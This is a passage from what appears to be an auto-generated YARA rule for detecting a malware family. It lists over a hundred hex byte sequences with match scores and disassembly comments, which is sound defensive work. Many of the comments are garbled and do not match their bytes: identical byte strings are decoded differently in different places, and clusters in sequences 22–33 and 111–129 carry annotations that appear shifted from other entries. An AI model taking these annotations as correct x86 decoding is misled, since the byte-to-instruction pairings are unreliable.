            //   4889442430           | mov                 dword ptr [esp + 0x40], eax

        $sequence_22 = { 488b01 4c8b4120 488b5118 488b4910 ffd0 }
            // n = 5, score = 2800
            //   488b01               | mov                 edx, dword ptr [ecx + 0x18]
            //   4c8b4120             | dec                 eax
            //   488b5118             | mov                 dword ptr [esp + 0x38], eax
            //   488b4910             | dec                 eax
            //   ffd0                 | mov                 eax, dword ptr [ecx + 0x40]

        $sequence_23 = { 48397c2430 0f94c3 8bc3 488b5c2450 }
            // n = 4, score = 2500
            //   48397c2430           | dec                 eax
            //   0f94c3               | mov                 eax, dword ptr [ecx + 0x38]
            //   8bc3                 | dec                 eax
            //   488b5c2450           | mov                 dword ptr [esp + 0x28], eax

        $sequence_24 = { 75f5 5f 8bc6 5e 8be5 }
            // n = 5, score = 2500
            //   75f5                 | jne                 0xfffffff7
            //   5f                   | pop                 edi
            //   8bc6                 | mov                 eax, esi
            //   5e                   | pop                 esi
            //   8be5                 | mov                 esp, ebp

        $sequence_25 = { 817c243003010000 0f94c3 8bc3 4883c420 }
            // n = 4, score = 2300
            //   817c243003010000     | mov                 eax, dword ptr [ecx + 0x20]
            //   0f94c3               | dec                 eax
            //   8bc3                 | mov                 edx, dword ptr [ecx + 0x18]
            //   4883c420             | dec                 eax

        $sequence_26 = { 56 ff15???????? 83f8ff 740b }
            // n = 4, score = 2000
            //   56                   | test                eax, 0x40000000
            //   ff15????????         |                     
            //   83f8ff               | je                  0x2c
            //   740b                 | and                 eax, 0x80000000

        $sequence_27 = { e8???????? 488bcf e8???????? 48891e }
            // n = 4, score = 1900
            //   e8????????           |                     
            //   488bcf               | je                  0x30
            //   e8????????           |                     
            //   48891e               | test                eax, 0x40000000

        $sequence_28 = { 85f6 7424 8b06 85c0 7407 }
            // n = 5, score = 1900
            //   85f6                 | and                 eax, 2
            //   7424                 | add                 eax, 2
            //   8b06                 | jmp                 0x1e
            //   85c0                 | jmp                 0x38
            //   7407                 | and                 eax, 0x80000000

        $sequence_29 = { ff15???????? 85c0 7405 488bfb }
            // n = 4, score = 1800
            //   ff15????????         |                     
            //   85c0                 | and                 eax, 0x80000000
            //   7405                 | neg                 eax
            //   488bfb               | sbb                 eax, eax

        $sequence_30 = { 48894c2428 488bce 4889442420 e8???????? }
            // n = 4, score = 1700
            //   48894c2428           | dec                 eax
            //   488bce               | mov                 dword ptr [esp + 0x38], eax
            //   4889442420           | dec                 eax
            //   e8????????           |                     

        $sequence_31 = { eb08 488bcb e8???????? 488bc7 }
            // n = 4, score = 1700
            //   eb08                 | mov                 ecx, dword ptr [ecx + 0x10]
            //   488bcb               | dec                 eax
            //   e8????????           |                     
            //   488bc7               | mov                 dword ptr [esp + 0x20], eax

        $sequence_32 = { e8???????? 488bf0 4885c0 0f8487000000 }
            // n = 4, score = 1700
            //   e8????????           |                     
            //   488bf0               | mov                 dword ptr [esp + 0x30], eax
            //   4885c0               | dec                 esp
            //   0f8487000000         | mov                 eax, dword ptr [ecx + 0x20]

        $sequence_33 = { 488d4dc0 ff15???????? 488d4dd8 ff15???????? }
            // n = 4, score = 1700
            //   488d4dc0             | dec                 eax
            //   ff15????????         |                     
            //   488d4dd8             | mov                 eax, dword ptr [ecx + 0x48]
            //   ff15????????         |                     

        $sequence_34 = { 488bcf e8???????? 488bcb e8???????? 33c0 488b5c2440 }
            // n = 6, score = 1700
            //   488bcf               | mov                 rcx, rdi
            //   e8????????           |                     
            //   488bcb               | mov                 rcx, rbx
            //   e8????????           |                     
            //   33c0                 | xor                 eax, eax
            //   488b5c2440           | mov                 rbx, qword ptr [rsp + 0x40]

        $sequence_35 = { 488b4808 4885c9 7409 e8???????? }
            // n = 4, score = 1700
            //   488b4808             | mov                 rcx, qword ptr [rax + 8]
            //   4885c9               | test                rcx, rcx
            //   7409                 | je                  0xb
            //   e8????????           |                     

        $sequence_36 = { 740d 4d85e4 7408 498bcc }
            // n = 4, score = 1700
            //   740d                 | je                  0xf
            //   4d85e4               | test                r12, r12
            //   7408                 | je                  0xa
            //   498bcc               | mov                 rcx, r12

        $sequence_37 = { 4c8d45f0 33d2 488bc8 e8???????? 85c0 }
            // n = 5, score = 1600
            //   4c8d45f0             | lea                 r8, [rbp - 0x10]
            //   33d2                 | xor                 edx, edx
            //   488bc8               | mov                 rcx, rax
            //   e8????????           |                     
            //   85c0                 | test                eax, eax

        $sequence_38 = { 48895c2428 4889442420 ff15???????? 85c0 }
            // n = 4, score = 1600
            //   48895c2428           | mov                 qword ptr [rsp + 0x28], rbx
            //   4889442420           | mov                 qword ptr [rsp + 0x20], rax
            //   ff15????????         |                     
            //   85c0                 | test                eax, eax

        $sequence_39 = { e8???????? e8???????? e8???????? 33c9 ff15???????? }
            // n = 5, score = 1600
            //   e8????????           |                     
            //   e8????????           |                     
            //   e8????????           |                     
            //   33c9                 | xor                 ecx, ecx
            //   ff15????????         |                     

        $sequence_40 = { e8???????? 4885c0 740b 488bc8 e8???????? 488bf8 }
            // n = 6, score = 1600
            //   e8????????           |                     
            //   4885c0               | test                rax, rax
            //   740b                 | je                  0xd
            //   488bc8               | mov                 rcx, rax
            //   e8????????           |                     
            //   488bf8               | mov                 rdi, rax

        $sequence_41 = { 57 4883ec20 488be9 4885c9 }
            // n = 4, score = 1600
            //   57                   | push                rdi
            //   4883ec20             | sub                 rsp, 0x20
            //   488be9               | mov                 rbp, rcx
            //   4885c9               | test                rcx, rcx

        $sequence_42 = { e8???????? 488be8 4885c0 7449 }
            // n = 4, score = 1600
            //   e8????????           |                     
            //   488be8               | mov                 rbp, rax
            //   4885c0               | test                rax, rax
            //   7449                 | je                  0x4b

        $sequence_43 = { 4c8bc7 498bd4 488bce e8???????? }
            // n = 4, score = 1400
            //   4c8bc7               | mov                 r8, rdi
            //   498bd4               | mov                 rdx, r12
            //   488bce               | mov                 rcx, rsi
            //   e8????????           |                     

        $sequence_44 = { 7605 b857000780 85c0 785b }
            // n = 4, score = 1400
            //   7605                 | jbe                 7
            //   b857000780           | mov                 eax, 0x80070057
            //   85c0                 | test                eax, eax
            //   785b                 | js                  0x5d

        $sequence_45 = { 488bd0 488bcf e8???????? bb01000000 }
            // n = 4, score = 1400
            //   488bd0               | mov                 rdx, rax
            //   488bcf               | mov                 rcx, rdi
            //   e8????????           |                     
            //   bb01000000           | mov                 ebx, 1

        $sequence_46 = { 83780400 7404 8b4008 c3 }
            // n = 4, score = 1400
            //   83780400             | cmp                 dword ptr [eax + 4], 0
            //   7404                 | je                  6
            //   8b4008               | mov                 eax, dword ptr [eax + 8]
            //   c3                   | ret                 

        $sequence_47 = { e8???????? 488b4c2430 8bf8 4885c9 }
            // n = 4, score = 1400
            //   e8????????           |                     
            //   488b4c2430           | mov                 rcx, qword ptr [rsp + 0x30]
            //   8bf8                 | mov                 edi, eax
            //   4885c9               | test                rcx, rcx

        $sequence_48 = { 2bc2 d1e8 03c2 c1e806 6bc05f }
            // n = 5, score = 1400
            //   2bc2                 | sub                 eax, edx
            //   d1e8                 | shr                 eax, 1
            //   03c2                 | add                 eax, edx
            //   c1e806               | shr                 eax, 6
            //   6bc05f               | imul                eax, eax, 0x5f

        $sequence_49 = { 8b05???????? 85c0 7f0b e8???????? }
            // n = 4, score = 1300
            //   8b05????????         |                     
            //   85c0                 | test                eax, eax
            //   7f0b                 | jg                  0xd
            //   e8????????           |                     

        $sequence_50 = { d1e9 03ca c1e905 6bc93e }
            // n = 4, score = 1300
            //   d1e9                 | shr                 ecx, 1
            //   03ca                 | add                 ecx, edx
            //   c1e905               | shr                 ecx, 5
            //   6bc93e               | imul                ecx, ecx, 0x3e

        $sequence_51 = { e8???????? 83f801 7411 ba0a000000 }
            // n = 4, score = 1300
            //   e8????????           |                     
            //   83f801               | cmp                 eax, 1
            //   7411                 | je                  0x13
            //   ba0a000000           | mov                 edx, 0xa

        $sequence_52 = { e8???????? 488b15???????? 488d4c2420 e8???????? }
            // n = 4, score = 1300
            //   e8????????           |                     
            //   488b15????????       |                     
            //   488d4c2420           | lea                 rcx, [rsp + 0x20]
            //   e8????????           |                     

        $sequence_53 = { 488bcf e8???????? 8bc3 488b9c2480000000 }
            // n = 4, score = 1300
            //   488bcf               | mov                 rcx, rdi
            //   e8????????           |                     
            //   8bc3                 | mov                 eax, ebx
            //   488b9c2480000000     | mov                 rbx, qword ptr [rsp + 0x80]

        $sequence_54 = { 488b01 488b4910 ffd0 ba01000000 }
            // n = 4, score = 1300
            //   488b01               | mov                 rax, qword ptr [rcx]
            //   488b4910             | mov                 rcx, qword ptr [rcx + 0x10]
            //   ffd0                 | call                rax
            //   ba01000000           | mov                 edx, 1

        $sequence_55 = { 488bcf e8???????? 85c0 0f45de }
            // n = 4, score = 1300
            //   488bcf               | mov                 rcx, rdi
            //   e8????????           |                     
            //   85c0                 | test                eax, eax
            //   0f45de               | cmovne              ebx, esi

        $sequence_56 = { 7405 e8???????? ff15???????? 8bc3 }
            // n = 4, score = 1200
            //   7405                 | je                  7
            //   e8????????           |                     
            //   ff15????????         |                     
            //   8bc3                 | mov                 eax, ebx

        $sequence_57 = { 85c0 741c 3bc1 7213 }
            // n = 4, score = 1200
            //   85c0                 | test                eax, eax
            //   741c                 | je                  0x1e
            //   3bc1                 | cmp                 eax, ecx
            //   7213                 | jb                  0x15

        $sequence_58 = { 57 57 ff15???????? 68f4010000 ff15???????? }
            // n = 5, score = 1200
            //   57                   | push                edi
            //   57                   | push                edi
            //   ff15????????         |                     
            //   68f4010000           | push                0x1f4
            //   ff15????????         |                     

        $sequence_59 = { 8bc1 66ad 85c0 741c }
            // n = 4, score = 1200
            //   8bc1                 | mov                 eax, ecx
            //   66ad                 | lodsw               ax, word ptr [esi]
            //   85c0                 | test                eax, eax
            //   741c                 | je                  0x1e

        $sequence_60 = { c1e102 2bc1 8b00 894508 }
            // n = 4, score = 1200
            //   c1e102               | shl                 ecx, 2
            //   2bc1                 | sub                 eax, ecx
            //   8b00                 | mov                 eax, dword ptr [eax]
            //   894508               | mov                 dword ptr [ebp + 8], eax

        $sequence_61 = { 03d0 52 ebdc 89450c }
            // n = 4, score = 1200
            //   03d0                 | add                 edx, eax
            //   52                   | push                edx
            //   ebdc                 | jmp                 0xffffffde
            //   89450c               | mov                 dword ptr [ebp + 0xc], eax

        $sequence_62 = { 8b01 59 03d0 52 }
            // n = 4, score = 1200
            //   8b01                 | mov                 eax, dword ptr [ecx]
            //   59                   | pop                 ecx
            //   03d0                 | add                 edx, eax
            //   52                   | push                edx

        $sequence_63 = { 33d2 488b01 ff9020020000 488b4c2440 33d2 488b01 ff9030020000 }
            // n = 7, score = 1200
            //   33d2                 | xor                 edx, edx
            //   488b01               | mov                 rax, qword ptr [rcx]
            //   ff9020020000         | call                qword ptr [rax + 0x220]
            //   488b4c2440           | mov                 rcx, qword ptr [rsp + 0x40]
            //   33d2                 | xor                 edx, edx
            //   488b01               | mov                 rax, qword ptr [rcx]
            //   ff9030020000         | call                qword ptr [rax + 0x230]

        $sequence_64 = { e8???????? 53 e8???????? 83c404 33db }
            // n = 5, score = 1200
            //   e8????????           |                     
            //   53                   | push                ebx
            //   e8????????           |                     
            //   83c404               | add                 esp, 4
            //   33db                 | xor                 ebx, ebx

        $sequence_65 = { 51 68e9fd0000 50 e8???????? }
            // n = 4, score = 1200
            //   51                   | push                ecx
            //   68e9fd0000           | push                0xfde9
            //   50                   | push                eax
            //   e8????????           |                     

        $sequence_66 = { 33d2 488b01 ff90f8010000 488b4c2440 }
            // n = 4, score = 1200
            //   33d2                 | xor                 edx, edx
            //   488b01               | mov                 rax, qword ptr [rcx]
            //   ff90f8010000         | call                qword ptr [rax + 0x1f8]
            //   488b4c2440           | mov                 rcx, qword ptr [rsp + 0x40]

        $sequence_67 = { ff5508 8b5510 8b4a04 ff5508 50 51 50 }
            // n = 7, score = 1100
            //   ff5508               | call                dword ptr [ebp + 8]
            //   8b5510               | mov                 edx, dword ptr [ebp + 0x10]
            //   8b4a04               | mov                 ecx, dword ptr [edx + 4]
            //   ff5508               | call                dword ptr [ebp + 8]
            //   50                   | push                eax
            //   51                   | push                ecx
            //   50                   | push                eax

        $sequence_68 = { 7413 4883c002 48ffc9 75f2 }
            // n = 4, score = 1100
            //   7413                 | je                  0x15
            //   4883c002             | add                 rax, 2
            //   48ffc9               | dec                 rcx
            //   75f2                 | jne                 0xfffffff4

        $sequence_69 = { 4533c0 33d2 ff15???????? 4c8bf0 4885c0 }
            // n = 5, score = 1100
            //   4533c0               | xor                 r8d, r8d
            //   33d2                 | xor                 edx, edx
            //   ff15????????         |                     
            //   4c8bf0               | mov                 r14, rax
            //   4885c0               | test                rax, rax

        $sequence_70 = { 85d2 7912 eb05 ba57000780 }
            // n = 4, score = 1100
            //   85d2                 | test                edx, edx
            //   7912                 | jns                 0x14
            //   eb05                 | jmp                 7
            //   ba57000780           | mov                 edx, 0x80070057

        $sequence_71 = { 48897c2420 488d7aff 4c8d4c2458 488bd7 ff15???????? 85c0 781b }
            // n = 7, score = 1100
            //   48897c2420           | mov                 qword ptr [rsp + 0x20], rdi
            //   488d7aff             | lea                 rdi, [rdx - 1]
            //   4c8d4c2458           | lea                 r9, [rsp + 0x58]
            //   488bd7               | mov                 rdx, rdi
            //   ff15????????         |                     
            //   85c0                 | test                eax, eax
            //   781b                 | js                  0x1d

        $sequence_72 = { 488b01 ff9080000000 8bf8 85c0 }
            // n = 4, score = 1100
            //   488b01               | mov                 rax, qword ptr [rcx]
            //   ff9080000000         | call                qword ptr [rax + 0x80]
            //   8bf8                 | mov                 edi, eax
            //   85c0                 | test                eax, eax

        $sequence_73 = { 7406 ff15???????? 4885db 7409 }
            // n = 4, score = 1100
            //   7406                 | je                  8
            //   ff15????????         |                     
            //   4885db               | test                rbx, rbx
            //   7409                 | je                  0xb

        $sequence_74 = { 488bd9 488b4920 e8???????? 85c0 }
            // n = 4, score = 1100
            //   488bd9               | mov                 rbx, rcx
            //   488b4920             | mov                 rcx, qword ptr [rcx + 0x20]
            //   e8????????           |                     
            //   85c0                 | test                eax, eax

        $sequence_75 = { ff15???????? 85c0 781b 4898 483bc7 7714 751b }
            // n = 7, score = 1100
            //   ff15????????         |                     
            //   85c0                 | test                eax, eax
            //   781b                 | js                  0x1d
            //   4898                 | cdqe                
            //   483bc7               | cmp                 rax, rdi
            //   7714                 | ja                  0x16
            //   751b                 | jne                 0x1d

        $sequence_76 = { 03d0 895510 8b4a04 ff5508 }
            // n = 4, score = 1100
            //   03d0                 | add                 edx, eax
            //   895510               | mov                 dword ptr [ebp + 0x10], edx
            //   8b4a04               | mov                 ecx, dword ptr [edx + 4]
            //   ff5508               | call                dword ptr [ebp + 8]

        $sequence_77 = { 59 ff5508 58 894514 8b5510 }
            // n = 5, score = 1100
            //   59                   | pop                 ecx
            //   ff5508               | call                dword ptr [ebp + 8]
            //   58                   | pop                 eax
            //   894514               | mov                 dword ptr [ebp + 0x14], eax
            //   8b5510               | mov                 edx, dword ptr [ebp + 0x10]

        $sequence_78 = { e8???????? 488bf8 eb02 33ff 488b5310 }
            // n = 5, score = 1000
            //   e8????????           |                     
            //   488bf8               | mov                 rdi, rax
            //   eb02                 | jmp                 4
            //   33ff                 | xor                 edi, edi
            //   488b5310             | mov                 rdx, qword ptr [rbx + 0x10]

        $sequence_79 = { 33d2 ff15???????? 85c0 7909 8bc8 e8???????? eb28 }
            // n = 7, score = 900
            //   33d2                 | xor                 edx, edx
            //   ff15????????         |                     
            //   85c0                 | test                eax, eax
            //   7909                 | jns                 0xb
            //   8bc8                 | mov                 ecx, eax
            //   e8????????           |                     
            //   eb28                 | jmp                 0x2a

        $sequence_80 = { 7536 b906000000 8bc1 c3 }
            // n = 4, score = 900
            //   7536                 | jne                 0x38
            //   b906000000           | mov                 ecx, 6
            //   8bc1                 | mov                 eax, ecx
            //   c3                   | ret                 

        $sequence_81 = { 50 57 e8???????? 85c0 7411 }
            // n = 5, score = 900
            //   50                   | push                eax
            //   57                   | push                edi
            //   e8????????           |                     
            //   85c0                 | test                eax, eax
            //   7411                 | je                  0x13

        $sequence_82 = { 84c0 742e 660f1f440000 3c30 7c22 }
            // n = 5, score = 900
            //   84c0                 | test                al, al
            //   742e                 | je                  0x30
            //   660f1f440000         | nop                 word ptr [eax + eax]
            //   3c30                 | cmp                 al, 0x30
            //   7c22                 | jl                  0x24

        $sequence_83 = { eb0a 83f802 742b 83f803 }
            // n = 4, score = 900
            //   eb0a                 | jmp                 0xc
            //   83f802               | cmp                 eax, 2
            //   742b                 | je                  0x2d
            //   83f803               | cmp                 eax, 3

        $sequence_84 = { ffd3 50 ff15???????? 8bf0 3bf7 }
            // n = 5, score = 900
            //   ffd3                 | call                ebx
            //   50                   | push                eax
            //   ff15????????         |                     
            //   8bf0                 | mov                 esi, eax
            //   3bf7                 | cmp                 esi, edi

        $sequence_85 = { 488b01 ff9080000000 8bd8 85c0 }
            // n = 4, score = 900
            //   488b01               | mov                 rax, qword ptr [rcx]
            //   ff9080000000         | call                qword ptr [rax + 0x80]
            //   8bd8                 | mov                 ebx, eax
            //   85c0                 | test                eax, eax

        $sequence_86 = { e8???????? e8???????? 8bd8 85c0 740f 8bc8 }
            // n = 6, score = 900
            //   e8????????           |                     
            //   e8????????           |                     
            //   8bd8                 | mov                 ebx, eax
            //   85c0                 | test                eax, eax
            //   740f                 | je                  0x11
            //   8bc8                 | mov                 ecx, eax

        $sequence_87 = { ff15???????? 85c0 790f 8bc8 }
            // n = 4, score = 900
            //   ff15????????         |                     
            //   85c0                 | test                eax, eax
            //   790f                 | jns                 0x11
            //   8bc8                 | mov                 ecx, eax

        $sequence_88 = { 745b 3bd1 0f8293000000 038e8c000000 }
            // n = 4, score = 900
            //   745b                 | je                  0x5d
            //   3bd1                 | cmp                 edx, ecx
            //   0f8293000000         | jb                  0x99
            //   038e8c000000         | add                 ecx, dword ptr [esi + 0x8c]

        $sequence_89 = { 89742428 c744242000001f00 ff15???????? 85c0 7911 8bc8 }
            // n = 6, score = 900
            //   89742428             | mov                 dword ptr [esp + 0x28], esi
            //   c744242000001f00     | mov                 dword ptr [esp + 0x20], 0x1f0000
            //   ff15????????         |                     
            //   85c0                 | test                eax, eax
            //   7911                 | jns                 0x13
            //   8bc8                 | mov                 ecx, eax

        $sequence_90 = { 4885d2 7442 41b9feffff7f 4c2bca 4c2bc1 }
            // n = 5, score = 800
            //   4885d2               | test                rdx, rdx
            //   7442                 | je                  0x44
            //   41b9feffff7f         | mov                 r9d, 0x7ffffffe
            //   4c2bca               | sub                 r9, rdx
            //   4c2bc1               | sub                 r8, rcx

        $sequence_91 = { 4885c0 7428 410fb70408 6685c0 741e }
            // n = 5, score = 800
            //   4885c0               | test                rax, rax
            //   7428                 | je                  0x2a
            //   410fb70408           | movzx               eax, word ptr [r8 + rcx]
            //   6685c0               | test                ax, ax
            //   741e                 | je                  0x20

        $sequence_92 = { ff7508 e8???????? 8bf8 897df4 }
            // n = 4, score = 800
            //   ff7508               | push                dword ptr [ebp + 8]
            //   e8????????           |                     
            //   8bf8                 | mov                 edi, eax
            //   897df4               | mov                 dword ptr [ebp - 0xc], edi

        $sequence_93 = { eb12 4885c9 750a ba57000780 }
            // n = 4, score = 800
            //   eb12                 | jmp                 0x14
            //   4885c9               | test                rcx, rcx
            //   750a                 | jne                 0xc
            //   ba57000780           | mov                 edx, 0x80070057

        $sequence_94 = { ffd0 8bf0 85f6 745d }
            // n = 4, score = 700
            //   ffd0                 | call                eax
            //   8bf0                 | mov                 esi, eax
            //   85f6                 | test                esi, esi
            //   745d                 | je                  0x5f

        $sequence_95 = { 57 6a01 50 ff15???????? 6a00 }
            // n = 5, score = 700
            //   57                   | push                edi
            //   6a01                 | push                1
            //   50                   | push                eax
            //   ff15????????         |                     
            //   6a00                 | push                0

        $sequence_96 = { 8bc7 e8???????? 85c0 0f849f000000 }
            // n = 4, score = 700
            //   8bc7                 | mov                 eax, edi
            //   e8????????           |                     
            //   85c0                 | test                eax, eax
            //   0f849f000000         | je                  0xa5

        $sequence_97 = { 8bf7 8bd7 fc 8bc1 66ad }
            // n = 5, score = 700
            //   8bf7                 | mov                 esi, edi
            //   8bd7                 | mov                 edx, edi
            //   fc                   | cld                 
            //   8bc1                 | mov                 eax, ecx
            //   66ad                 | lodsw               ax, word ptr [esi]

        $sequence_98 = { 57 33ff 897df8 897df0 }
            // n = 4, score = 700
            //   57                   | push                edi
            //   33ff                 | xor                 edi, edi
            //   897df8               | mov                 dword ptr [ebp - 8], edi
            //   897df0               | mov                 dword ptr [ebp - 0x10], edi

        $sequence_99 = { 50 e2fd 8bc7 57 8bec }
            // n = 5, score = 700
            //   50                   | push                eax
            //   e2fd                 | loop                0xffffffff
            //   8bc7                 | mov                 eax, edi
            //   57                   | push                edi
            //   8bec                 | mov                 ebp, esp

        $sequence_100 = { 33d2 488bc8 ff15???????? 4885c0 }
            // n = 4, score = 700
            //   33d2                 | xor                 edx, edx
            //   488bc8               | mov                 rcx, rax
            //   ff15????????         |                     
            //   4885c0               | test                rax, rax

        $sequence_101 = { 8bd8 85db 750b 5e }
            // n = 4, score = 700
            //   8bd8                 | mov                 ebx, eax
            //   85db                 | test                ebx, ebx
            //   750b                 | jne                 0xd
            //   5e                   | pop                 esi

        $sequence_102 = { 8b3cb0 6a00 e8???????? 85c0 }
            // n = 4, score = 700
            //   8b3cb0               | mov                 edi, dword ptr [eax + esi*4]
            //   6a00                 | push                0
            //   e8????????           |                     
            //   85c0                 | test                eax, eax

        $sequence_103 = { 33c0 5b 8be5 5d c21000 8b450c }
            // n = 6, score = 700
            //   33c0                 | xor                 eax, eax
            //   5b                   | pop                 ebx
            //   8be5                 | mov                 esp, ebp
            //   5d                   | pop                 ebp
            //   c21000               | ret                 0x10
            //   8b450c               | mov                 eax, dword ptr [ebp + 0xc]

        $sequence_104 = { 3bc1 7213 2bc1 51 8bcf }
            // n = 5, score = 700
            //   3bc1                 | cmp                 eax, ecx
            //   7213                 | jb                  0x15
            //   2bc1                 | sub                 eax, ecx
            //   51                   | push                ecx
            //   8bcf                 | mov                 ecx, edi

        $sequence_105 = { 895df0 895dfc 895df8 895dec }
            // n = 4, score = 700
            //   895df0               | mov                 dword ptr [ebp - 0x10], ebx
            //   895dfc               | mov                 dword ptr [ebp - 4], ebx
            //   895df8               | mov                 dword ptr [ebp - 8], ebx
            //   895dec               | mov                 dword ptr [ebp - 0x14], ebx

        $sequence_106 = { 4533c0 418bd6 ff15???????? 85c0 }
            // n = 4, score = 600
            //   4533c0               | xor                 r8d, r8d
            //   418bd6               | mov                 edx, r14d
            //   ff15????????         |                     
            //   85c0                 | test                eax, eax

        $sequence_107 = { 48895c2408 48896c2410 4889742418 57 4883ec20 0fb732 }
            // n = 6, score = 500
            //   48895c2408           | mov                 qword ptr [rsp + 8], rbx
            //   48896c2410           | mov                 qword ptr [rsp + 0x10], rbp
            //   4889742418           | mov                 qword ptr [rsp + 0x18], rsi
            //   57                   | push                rdi
            //   4883ec20             | sub                 rsp, 0x20
            //   0fb732               | movzx               esi, word ptr [rdx]

        $sequence_108 = { 488b9c2440010000 4885c9 7406 ff15???????? }
            // n = 4, score = 500
            //   488b9c2440010000     | mov                 rbx, qword ptr [rsp + 0x140]
            //   4885c9               | test                rcx, rcx
            //   7406                 | je                  8
            //   ff15????????         |                     

        $sequence_109 = { 55 57 56 53 4883ec48 31c0 668944243e }
            // n = 7, score = 500
            //   55                   | push                rbp
            //   57                   | push                rdi
            //   56                   | push                rsi
            //   53                   | push                rbx
            //   4883ec48             | sub                 rsp, 0x48
            //   31c0                 | xor                 eax, eax
            //   668944243e           | mov                 word ptr [rsp + 0x3e], ax

        $sequence_110 = { 488b55e8 4883fa10 7212 48ffc2 41b801000000 }
            // n = 5, score = 500
            //   488b55e8             | mov                 rdx, qword ptr [rbp - 0x18]
            //   4883fa10             | cmp                 rdx, 0x10
            //   7212                 | jb                  0x14
            //   48ffc2               | inc                 rdx
            //   41b801000000         | mov                 r8d, 1

        $sequence_111 = { 83e0df 4409d8 4388040a 4983c101 4983f903 75e7 }
            // n = 6, score = 500
            //   83e0df               | dec                 eax
            //   4409d8               | mov                 eax, dword ptr [ecx + 0x40]
            //   4388040a             | dec                 eax
            //   4983c101             | mov                 dword ptr [esp + 0x30], eax
            //   4983f903             | dec                 eax
            //   75e7                 | mov                 eax, dword ptr [ecx + 0x38]

        $sequence_112 = { 488d4c2420 e8???????? cc 8325????????00 c3 48895c2408 }
            // n = 6, score = 500
            //   488d4c2420           | add                 eax, 0x20
            //   e8????????           |                     
            //   cc                   | jmp                 0x40
            //   8325????????00       |                     
            //   c3                   | and                 eax, 0x80000000
            //   48895c2408           | neg                 eax

        $sequence_113 = { 4d89c5 757a 8b05???????? 85c0 }
            // n = 4, score = 500
            //   4d89c5               | dec                 eax
            //   757a                 | mov                 eax, dword ptr [ecx + 0x48]
            //   8b05????????         |                     
            //   85c0                 | dec                 eax

        $sequence_114 = { ff15???????? 488bce ff15???????? 488bc8 }
            // n = 4, score = 500
            //   ff15????????         |                     
            //   488bce               | dec                 eax
            //   ff15????????         |                     
            //   488bc8               | mov                 edx, dword ptr [ecx + 0x18]

        $sequence_115 = { 85c9 7e32 483bfb 480f4cdf 4885db }
            // n = 5, score = 500
            //   85c9                 | and                 eax, 2
            //   7e32                 | add                 eax, 2
            //   483bfb               | jmp                 0x12
            //   480f4cdf             | and                 eax, 0x80000000
            //   4885db               | neg                 eax

        $sequence_116 = { 488b742438 4883c420 5f 48ffe0 488b5c2430 488b742438 4883c420 }
            // n = 7, score = 500
            //   488b742438           | test                eax, 0x40000000
            //   4883c420             | add                 eax, 2
            //   5f                   | jmp                 0x12
            //   48ffe0               | and                 eax, 0x80000000
            //   488b5c2430           | neg                 eax
            //   488b742438           | sbb                 eax, eax
            //   4883c420             | and                 eax, 0x80000000

        $sequence_117 = { 66837b2000 74cf 89f0 f7ed 89f0 }
            // n = 5, score = 500
            //   66837b2000           | mov                 eax, dword ptr [ecx + 0x20]
            //   74cf                 | dec                 eax
            //   89f0                 | mov                 edx, dword ptr [ecx + 0x18]
            //   f7ed                 | dec                 eax
            //   89f0                 | mov                 dword ptr [esp + 0x40], eax

        $sequence_118 = { 8d50ff 85c0 89560c 7fe6 448b5e08 41f6c380 }
            // n = 6, score = 500
            //   8d50ff               | dec                 eax
            //   85c0                 | mov                 dword ptr [esp + 0x28], eax
            //   89560c               | dec                 esp
            //   7fe6                 | mov                 ecx, dword ptr [ecx + 0x28]
            //   448b5e08             | dec                 esp
            //   41f6c380             | mov                 eax, dword ptr [ecx + 0x20]

        $sequence_119 = { 833d????????02 488b0cd0 48891cd0 48890b }
            // n = 4, score = 500
            //   833d????????02       |                     
            //   488b0cd0             | mov                 dword ptr [esp + 0x38], eax
            //   48891cd0             | dec                 eax
            //   48890b               | mov                 eax, dword ptr [ecx + 0x40]

        $sequence_120 = { 4883ec20 488b05???????? 488bfa 488bf1 4885c0 }
            // n = 5, score = 500
            //   4883ec20             | and                 eax, 0x80000000
            //   488b05????????       |                     
            //   488bfa               | neg                 eax
            //   488bf1               | and                 eax, 2
            //   4885c0               | add                 eax, 2

        $sequence_121 = { 4885c9 740a e8???????? 4885c0 }
            // n = 4, score = 500
            //   4885c9               | mov                 ecx, dword ptr [ecx + 0x28]
            //   740a                 | dec                 esp
            //   e8????????           |                     
            //   4885c0               | mov                 eax, dword ptr [ecx + 0x20]

        $sequence_122 = { 740b 488bd3 498bce e8???????? }
            // n = 4, score = 500
            //   740b                 | lodsw               ax, word ptr [esi]
            //   488bd3               | test                eax, eax
            //   498bce               | je                  0x54
            //   e8????????           |                     

        $sequence_123 = { 480f4cdf 4885db 740b 4c8bc3 }
            // n = 4, score = 500
            //   480f4cdf             | add                 edi, 0x24
            //   4885db               | mov                 eax, dword ptr [edi]
            //   740b                 | test                eax, 0x20000000
            //   4c8bc3               | je                  0x32

        $sequence_124 = { ff15???????? 4531c9 4531c0 31d2 }
            // n = 4, score = 500
            //   ff15????????         |                     
            //   4531c9               | dec                 eax
            //   4531c0               | mov                 edx, edi
            //   31d2                 | dec                 eax

        $sequence_125 = { 488b8b80000000 e8???????? 90 33d2 448d4202 488bcb e8???????? }
            // n = 7, score = 500
            //   488b8b80000000       | je                  0x32
            //   e8????????           |                     
            //   90                   | test                eax, 0x40000000
            //   33d2                 | mov                 dword ptr [ebp - 0xc], ebx
            //   448d4202             | mov                 dword ptr [ebp - 0x14], ebx
            //   488bcb               | mov                 word ptr [ebp - 0x10], 0x500
            //   e8????????           |                     

        $sequence_126 = { 4885c9 7405 e8???????? 4989f0 }
            // n = 4, score = 500
            //   4885c9               | jne                 0x1c
            //   7405                 | dec                 ebp
            //   e8????????           |                     
            //   4989f0               | mov                 eax, esp

        $sequence_127 = { 448944243c e8???????? 448b44243c 83e801 894310 8b4c2458 4989d9 }
            // n = 7, score = 500
            //   448944243c           | dec                 eax
            //   e8????????           |                     
            //   448b44243c           | mov                 dword ptr [esp + 0x30], eax
            //   83e801               | dec                 eax
            //   894310               | mov                 edx, dword ptr [ecx + 0x18]
            //   8b4c2458             | dec                 eax
            //   4989d9               | mov                 dword ptr [esp + 0x38], eax

        $sequence_128 = { 8b38 e8???????? 0fb7d6 4189c0 4889d9 4189f9 }
            // n = 6, score = 500
            //   8b38                 | dec                 eax
            //   e8????????           |                     
            //   0fb7d6               | mov                 edx, dword ptr [ecx + 0x18]
            //   4189c0               | dec                 eax
            //   4889d9               | mov                 dword ptr [esp + 0x40], eax
            //   4189f9               | dec                 eax

        $sequence_129 = { 8b08 eb02 33c9 4863d9 }
            // n = 4, score = 500
            //   8b08                 | and                 eax, 0x80000000
            //   eb02                 | neg                 eax
            //   33c9                 | sbb                 eax, eax
